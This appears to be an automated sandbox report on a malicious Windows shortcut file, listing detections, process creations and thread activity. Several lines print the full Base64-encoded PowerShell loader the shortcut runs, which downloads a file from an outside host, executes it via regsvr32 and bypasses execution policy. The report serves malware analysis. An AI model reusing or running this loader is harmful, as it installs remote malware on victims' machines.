Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLm
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\regsvr32.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\regsvr32.exeJump to behavior

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1 ; powershell -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1; Remove-Item C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding Pow
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1589Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8299Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1189Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8667Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 1189 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 8667 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2436387849.000001BD5F047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2432084247.000001BD5DA30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1274351518.0000027B9B705000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMoJump to behavior
